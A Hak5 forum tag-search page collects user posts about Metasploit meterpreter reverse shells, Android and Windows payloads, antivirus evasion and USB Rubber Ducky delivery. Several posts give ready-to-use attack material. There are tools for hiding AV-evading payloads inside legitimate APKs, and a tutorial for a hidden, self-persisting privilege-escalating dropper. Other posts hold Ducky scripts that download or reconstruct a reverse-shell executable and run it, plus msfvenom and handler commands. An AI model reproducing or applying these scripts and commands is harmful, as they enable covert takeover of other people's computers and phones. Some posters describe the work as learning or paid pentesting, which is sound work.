Jump to content

Search the Community

Showing results for tags 'meterpreter'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector
  2. Hi I'm reasonably new to using metasploit and can create a .apk with reverse shell without any issues but when I upload it on my test android running 8.1, it does not open a connection. It lets me install it but gives no option to open and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have gave the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong? Much appreciated...
  3. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  4. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  5. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0 So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!
  6. I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  7. blackcoat

    Meterpreter

    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  8. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  9. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  10. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  11. Im trying to exploit my rooted galaxy core prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. Im having a bit of trouble getting a shell. Ive got to the point where a session is created, but when i try to interact with the session to get a shelll it just stops and hangs and does nothing. Ive tried different payloads but the same thing happens everytime. It just says interacting with session <ID>, and I cant get any further than that. Any tips or help would be appreciated. And Im also a bit confused on configuring the reverse shell payload. is the LHOST supposed to be my IP or the victims in a reverse shell. plus what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort? Thank you.
  12. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
  13. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  14. hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!
  15. I was a little curious about the PrependMigrate option for meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas? msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL=http://192.168.1.10/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw
  16. Hi, I've been trying to upload a .vbs file to a remote machine in a meterpreter session without success. This problem also occurs with .exe files so it's not the .vbs file type not being supported. I've tried this: upload root/Desktop/program.vbs c:\\Users\\i7479\\Desktop This returns: [-] Error running command upload: Errno:ENOENT No such file or directory @ rb__file_s__stat - root/Desktop/program.vbs The paths for these files are both correct, it just can't find the program to be uploaded... Does anyone know how to carry this out? Should such a basic command be so tricky to execute? This doesn't work on Armitage (GUI) either btw...
  17. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  18. Hi.......i have a problem, hope somebody can help me! Ok,....... I have created a Reverse TCP DNS payload with MSFVenom...... Now i want to execute this File with plugging in the USB Rubber Ducky! How i got to do this? Do i have to convert my Payload with Base64? And if yes, how i could do this? Please help me!
  19. Hey guys, I recently came across an error or "glitch" which involves the browsing in a remote machine's files in meterpreter shell. I noticed that with files that have a space or many spaces in their name cannot be opened. The meterpreter shell returns the following error: [-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified. This is especially annoying as one cannot access obvious locations such as Program Files since there is a space. I have tried using an underscore instead or just omitting the space, with no luck. What do you guys think? Cheers.
  20. Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!
  21. I am experiencing a slight problem. I used to use Kali Linux 1.1.0 and it was running very well. So I chose to update to Kali Linux 2.0.0. since my update to Kali 2.0.0 my Metasploit cannot establish a connection through the HTTPS Payload. The connection will be accepted and will open but my PC will say "Session is not valid and will be closed" if the connection gets established and stays open - (it sometimes works..) then my commands will not be executed. I have already created a new payload with mfsvenom and it doesn't solve my problem. Do you have any suggestions or experiences with this problem; and if yes can you please help me fix it.
  22. I have a meterpreter shell to a Mark V behind a firewall. I would like to use it to pivot to another box on the network, however I am not sure if the portfwd command is the way to go. It would be nice, for example, to use the portfwd to access an RDP session on a windows box. The pineapple has two interfaces, one wired, one wireless, both are on the local network. I'm using 4444 on the wired interface as the port to call home to the remote network. I have a machine on the local network that is listening on 3389. Anyone have a clear understanding of the portfwd command they could share?
  23. I am a kind of a noob on this one. I have this question. I share internet through tethering using my phone which is connected through the internet through the 3G network. I dont have any other way of accessing the internet, so no cable or wired connections. In the options for setting up an exploit in metasploit the LHOST option will not work if I set my public ip. This is because my ISP filters all incoming requests on all ports (The router is located at their site, no access).I would like to know if their is a way I could work around this, prefarably a free method.I already know I can use a VPS (Virtual Private Server) but thats expensive. Possible noobie solutions:proxies,VPNs.If this is a solution I would like to know how to setup the LPORT and LHOST. I am sorry if this has a simple answer. Environment: Kali linux version on VMware workstation--->Hosted on a windows machine Please help
  24. Hello! After reading about the LanTurtle and watching the videos for it i have a few questions about the product before i purchase it. Lets make the example that i have successfully installed the LanTurtle on a targeted computer. I've got remote SSH connection to Turtle and a meterpreter session active. As i've understood correctly the lanturtle is the only equipment on the network i have access to and not even the computer it is attached to! So if i want to get access to computers on the network i could use the meterpreter session and launch attacks to the computers from the turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network of course. Can the Turtle which is connected to the network also visit network folders/disks? Let's say there is a computer/Server sharing files and its accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to and transfer these files to the SSH server forexample? I'm pretty new to metasploit but still learning how it works and how it would work out with the LanTurtle the practical way. Also a great tool when i perform pentest for the local companies (FYI: legal and paid work, i don't plan to abuse this if someone were to ask ) i mostly do physical testing and assesment and this would be a really good tool for me as my other co-worker do the software/web part.
  25. I was having firewall issues. I remembered seeing problem like this addressed in a segment of Metasploit Minute I wanted to try windows/meterpreter/reverse_hop_http I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it. Edit: No idea what I was thinking there. use exploit/multi/handler set HOPURL http://192.168.0.184/hop.php set payload windows/meterpreter/reverse_hop_http exploit -j Second try. Nailed it.
×
×
  • Create New...